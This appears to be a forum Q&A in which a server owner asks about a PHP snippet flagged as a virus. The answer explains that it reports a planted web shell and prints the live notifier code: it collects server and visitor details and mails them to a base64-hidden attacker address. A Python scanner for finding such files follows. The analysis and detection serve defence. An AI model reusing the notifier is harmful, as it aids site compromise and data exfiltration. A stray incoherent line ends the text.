What is this virus, what is it aimed at?
Hello! Recently there were problems with the server (sudden load spikes, after which the server hung). I wrote to technical support, and they told me that, according to the ImunifyAV scan, this is a virus. But did it identify this correctly, and what is this virus aimed at?
PHP code on
Yandex cloud cloud
This piece of PHP code sends a message to [email protected] (it is encoded in "cG9ydG92amFja0BnbWFpbC5jb20=") about the successful installation of the shell on the site.
As you can see from the $body message, the PHP shell itself is located in the http://$web$path module. Look for this letter in the mail server logs; it was sent via the hoster's mailer.
Or look at the latest modification dates of the PHP files of the site engine - the shell itself is there.
$web = $_SERVER["HTTP_HOST"];
$path = $_SERVER["REQUEST_URI"];
$ip = $_SERVER["REMOTE_ADDR"];
$contact = base64_decode("cG9ydG92amFja0BnbWFpbC5jb20=");
$body = "\nUname: ".php_uname()."\nPath Dir: ".$cwd = getcwd()."\nMessage:\n"."\nE-Path: ".htmlspecialchars($_SERVER['REQUEST_URI'])."\nE-Domain: ".htmlspecialchars($_SERVER["SERVER_NAME"])."\nShell: http://$web$path\n\nIP: $ip";
mail("$contact","Result Shell in [http://$web]", "$body");
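The search the answer describes can be automated. The following is an added example, not part of the original answer: a Python sketch that walks a web root, flags PHP files that call mail() and hide a recipient address inside a base64_decode("...") literal, and lists them newest-modified first. The function names, the extension list and the regular expressions are assumptions made for this illustration, and the sample files are constructed.

```python
import base64, os, re, tempfile

# Assumed heuristics for this illustration: literal base64 argument, simple e-mail shape.
B64_CALL = re.compile(r"""base64_decode\(\s*["']([A-Za-z0-9+/=]{8,})["']\s*\)""")
EMAIL = re.compile(r"^[\w.+-]+@[\w-]+(\.[\w-]+)+$")
PHP_EXT = (".php", ".phtml", ".inc")

def hidden_emails(source):
    """Return e-mail addresses hidden in base64_decode("...") literals."""
    found = []
    for blob in B64_CALL.findall(source):
        try:
            text = base64.b64decode(blob, validate=True).decode("ascii")
        except ValueError:  # invalid base64 or non-ASCII payload
            continue
        if EMAIL.match(text):
            found.append(text)
    return found

def scan(root):
    """Flag PHP files that call mail() and hide a recipient; newest mtime first."""
    hits = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                source = fh.read()
            emails = hidden_emails(source)
            if emails and re.search(r"\bmail\s*\(", source):
                hits.append((os.path.getmtime(path), path, emails))
    return sorted(hits, reverse=True)

def demo():
    """Constructed sample: one clean file and one shaped like the snippet above."""
    addr = base64.b64encode(b"drop@example.com").decode()
    bad = '<?php $c = base64_decode("%s"); mail("$c", "Result", $_SERVER["HTTP_HOST"]);' % addr
    files = {"index.php": "<?php echo 'hello';", "cache.php": bad}
    with tempfile.TemporaryDirectory() as root:
        for name, body in files.items():
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
        return [(os.path.basename(p), e) for _, p, e in scan(root)]

if __name__ == "__main__":
    print(demo())
```

A hit only marks the notifier; the decoded address is also a useful search term for the mail server logs the answer mentions.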
classic walking . least.